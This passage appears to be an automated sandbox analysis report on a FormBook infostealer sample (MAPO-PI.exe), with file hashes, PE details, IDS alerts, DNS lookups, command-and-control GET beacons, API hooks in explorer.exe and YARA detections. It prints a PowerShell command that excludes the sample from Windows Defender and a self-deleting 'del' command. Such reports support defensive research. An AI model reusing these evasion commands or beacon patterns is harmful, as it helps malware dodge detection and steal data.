                                SHA-512: CAA1486D47A143B23E4731942B6477A338E389EDBD4ABFD49FF7737AC93827BFE384E130E1F04DDEC3CB2D73B7584B77CC1FA952706B65E6389EE08C31A2CE65
                                Malicious: false
                                Reputation: low
                                Preview: @...e...........j.......h...j.^.[.........H..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhm0t1yh.nml.psm1
                                Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type: very short file (no magic)
                                Category: dropped
                                Size (bytes): 1
                                Entropy (8bit): 0.0
                                Encrypted: false
                                SSDEEP: 3:U:U
                                MD5: C4CA4238A0B923820DCC509A6F75849B
                                SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious: false
                                Reputation: high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1
                                Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type: very short file (no magic)
                                Category: dropped
                                Size (bytes): 1
                                Entropy (8bit): 0.0
                                Encrypted: false
                                SSDEEP: 3:U:U
                                MD5: C4CA4238A0B923820DCC509A6F75849B
                                SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious: false
                                Reputation: high, very likely benign file
                                Preview: 1
                                C:\Users\user\Documents\20211028\PowerShell_transcript.855271.6SnYDjtu.20211028074006.txt
                                Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category: dropped
                                Size (bytes): 5707
                                Entropy (8bit): 5.381930049255417
                                Encrypted: false
                                SSDEEP: 96:BZjS/CN0S3qDo1ZpnRZz/CN0S3qDo1Z+4d+dQdjZW/CN0S3qDo1Zp5dAdAdOZh:fRn
                                MD5: 7A5FF84148F6EB95DFAF4DE3120DC911
                                SHA1: D168B38F281F305B45596159FE835682DEE2BF11
                                SHA-256: 053633604A80FDB3DFAFFB3D6E2DE3BE2A43F5C21A879683F57B6A74B5069EAA
                                SHA-512: FAD1460ED07176682C12624C401EDF38ED9C068BB0C3BE6C3909526C68E6135EDD04F64C576C79AF8526B1AB922A57566CBC9E10AA63BDCB8BE7D2167D07F43B
                                Malicious: false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211028074007..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 855271 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\MAPO-PI.exe..Process ID: 2592..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211028074007..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\MAPO-PI.exe..**********************..Windows PowerShell transcript start..Start time: 20211028074325..Username: computer\user..RunAs User: computer\user..Configuration

                                Static File Info

                                General

                                File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit): 6.69902416121267
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name: MAPO-PI.exe
                                File size: 532992 bytes
                                MD5: c619bbbe3c374c8fd3e9f2c26d087496
                                SHA1: a8f7e80f2c8e7687789f2267935610f81bc773d4
                                SHA256: 260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
                                SHA512: 754a8e96edeb6c2dc63a7530c7d791b2852cce2a90ee477de446d9ffd9304e8934a8e7088a34127643804c569cf8d40102e8a2c0867f57d6fa6e39cd9cc6b5a2
                                SSDEEP: 6144:CR5D/Qa1Hyw3Q3+3pajySWnMTritfg/784KxvFurGagGlkmOv7:2B/Qa1HyT4ajvSeitfWXKxdaWmI7
                                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ya..............0......D........... ........@.. ....................................@................................

                                File Icon

                                Icon Hash: 31b0b4b6b6b6b031

                                Static PE Info

                                General

                                Entrypoint: 0x47fb82
                                Entrypoint Section: .text
                                Digitally signed: false
                                Imagebase: 0x400000
                                Subsystem: windows gui
                                Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp: 0x6179BDEA [Wed Oct 27 21:00:26 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version: v4.0.30319
                                OS Version Major: 4
                                OS Version Minor: 0
                                File Version Major: 4
                                File Version Minor: 0
                                Subsystem Version Major: 4
                                Subsystem Version Minor: 0
                                Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7fb30 | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x4198 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0x7db88 | 0x7dc00 | False | 0.683504442097 | data | 6.69285851481 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc | 0x80000 | 0x4198 | 0x4200 | False | 0.244377367424 | data | 4.6611198492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0x86000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                Name | RVA | Size | Type | Language | Country
                                RT_ICON | 0x80190 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                RT_ICON | 0x805f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4280185157, next used block 4280185157 | |
                                RT_ICON | 0x816a0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4280185157, next used block 4280185157 | |
                                RT_GROUP_ICON | 0x83c48 | 0x30 | data | |
                                RT_VERSION | 0x83c78 | 0x334 | data | |
                                RT_MANIFEST | 0x83fac | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                Imports

                                DLL | Import
                                mscoree.dll | _CorExeMain

                                Version Infos

                                Description | Data
                                Translation | 0x0000 0x04b0
                                LegalCopyright | Delchamps 2015
                                Assembly Version | 7.3.0.0
                                InternalName | DebugVi.exe
                                FileVersion | 7.3.0.0
                                CompanyName | Delchamps
                                LegalTrademarks |
                                Comments |
                                ProductName | Platformer_AI
                                ProductVersion | 7.3.0.0
                                FileDescription | Platformer_AI
                                OriginalFilename | DebugVi.exe

                                Network Behavior

                                Snort IDS Alerts

                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                10/28/21-07:41:15.191108 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49783 | 34.102.136.180 | 192.168.2.5
                                10/28/21-07:41:56.621298 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 109.232.217.55
                                10/28/21-07:41:56.621298 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 109.232.217.55
                                10/28/21-07:41:56.621298 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 109.232.217.55

                                Network Port Distribution

                                TCP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2021 07:41:14.957154036 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Oct 28, 2021 07:41:14.980756044 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Oct 28, 2021 07:41:35.400157928 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Oct 28, 2021 07:41:35.425120115 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Oct 28, 2021 07:41:56.544334888 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Oct 28, 2021 07:41:56.564491987 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5

                                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 28, 2021 07:41:14.957154036 CEST | 192.168.2.5 | 8.8.8.8 | 0xeba | Standard query (0) | www.lifeinformpodcast.com | A (IP address) | IN (0x0001)
Oct 28, 2021 07:41:35.400157928 CEST | 192.168.2.5 | 8.8.8.8 | 0x97dc | Standard query (0) | www.transforming-leadership.com | A (IP address) | IN (0x0001)
Oct 28, 2021 07:41:56.544334888 CEST | 192.168.2.5 | 8.8.8.8 | 0xf306 | Standard query (0) | www.diofis.com | A (IP address) | IN (0x0001)

                                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 28, 2021 07:41:14.980756044 CEST | 8.8.8.8 | 192.168.2.5 | 0xeba | No error (0) | www.lifeinformpodcast.com | lifeinformpodcast.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 28, 2021 07:41:14.980756044 CEST | 8.8.8.8 | 192.168.2.5 | 0xeba | No error (0) | lifeinformpodcast.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Oct 28, 2021 07:41:35.425120115 CEST | 8.8.8.8 | 192.168.2.5 | 0x97dc | No error (0) | www.transforming-leadership.com | - | 159.65.10.143 | A (IP address) | IN (0x0001)
Oct 28, 2021 07:41:56.564491987 CEST | 8.8.8.8 | 192.168.2.5 | 0xf306 | No error (0) | www.diofis.com | diofis.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 28, 2021 07:41:56.564491987 CEST | 8.8.8.8 | 192.168.2.5 | 0xf306 | No error (0) | diofis.com | - | 109.232.217.55 | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.lifeinformpodcast.com
                                • www.transforming-leadership.com
                                • www.diofis.com

                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49783 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Oct 28, 2021 07:41:15.005089998 CEST | 1470 | OUT | GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1
                                Host: www.lifeinformpodcast.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
Oct 28, 2021 07:41:15.191107988 CEST | 1471 | IN | HTTP/1.1 403 Forbidden
                                Server: openresty
                                Date: Thu, 28 Oct 2021 05:41:15 GMT
                                Content-Type: text/html
                                Content-Length: 275
                                ETag: "61797038-113"
                                Via: 1.1 google
                                Connection: close
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49790 | 159.65.10.143 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Oct 28, 2021 07:41:35.714570045 CEST | 6796 | OUT | GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1
                                Host: www.transforming-leadership.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
Oct 28, 2021 07:41:36.150578976 CEST | 6797 | IN | HTTP/1.1 404 Not Found
                                Date: Thu, 28 Oct 2021 05:41:35 GMT
                                Server: Apache
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"
                                Referrer-Policy: no-referrer-when-downgrade
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: 97e3<!DOCTYPE html><html class="no-js" lang="en-AU"><head> <meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="pingback" href="http://www.transforming-leadership.com/xmlrpc.php"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v17.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Transforming Leadership</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Transforming Leadership" /><meta property="og:site_name" content="Transforming Leadership" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.transforming-leadership.com/#website","url":"https://www.transforming-leadership.com/","name":"Transforming Leadership","description":"","potentialActio


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49795 | 109.232.217.55 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Oct 28, 2021 07:41:56.621298075 CEST | 6859 | OUT | GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1
                                Host: www.diofis.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
Oct 28, 2021 07:41:56.921601057 CEST | 6860 | IN | HTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.24
                                content-type: text/html; charset=UTF-8
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                cache-control: no-cache, must-revalidate, max-age=0
                                link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache: miss
                                content-length: 33607
                                date: Thu, 28 Oct 2021 05:41:56 GMT
Data Ascii: <!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11">... This site is optimized with the Yoast SEO plugin v15.9.2 - https://yoast.com/wordpress/plugins/seo/ --><title>Sayfa bulunamadı - diofis</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="tr_TR" /><meta property="og:title" content="Sayfa bulunamadı - diofis" /><meta property="og:site_name" content="diofis" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"http://www.diofis.com/#organization","name":"Diofis Beslenme ve Diyet Ofisi","url":"http://www.diofis.com/","sameAs":[],"logo":{"@type":"ImageObject","@id":"http://www.diofis.com/#logo","inLanguage":"tr","url":"http://www.diofis.com/wp-content/uploads/2020/09/cropped-dio


                                Code Manipulations

                                User Modules

                                Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                Processes

                                Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEA
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEA
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEA
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEA

                                Statistics

                                Behavior


                                System Behavior

                                General

                                Start time:07:40:03
                                Start date:28/10/2021
                                Path:C:\Users\user\Desktop\MAPO-PI.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x70000
                                File size:532992 bytes
                                MD5 hash:C619BBBE3C374C8FD3E9F2C26D087496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:07:40:05
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x80000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                General

                                Start time:07:40:06
                                Start date:28/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:07:40:06
                                Start date:28/10/2021
                                Path:C:\Users\user\Desktop\MAPO-PI.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\MAPO-PI.exe
                                Imagebase:0xeb0000
                                File size:532992 bytes
                                MD5 hash:C619BBBE3C374C8FD3E9F2C26D087496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Start time:07:40:09
                                Start date:28/10/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Start time:07:40:31
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\cmmon32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                Imagebase:0x8b0000
                                File size:36864 bytes
                                MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                General

                                Start time:07:40:35
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del 'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:07:40:36
                                Start date:28/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis
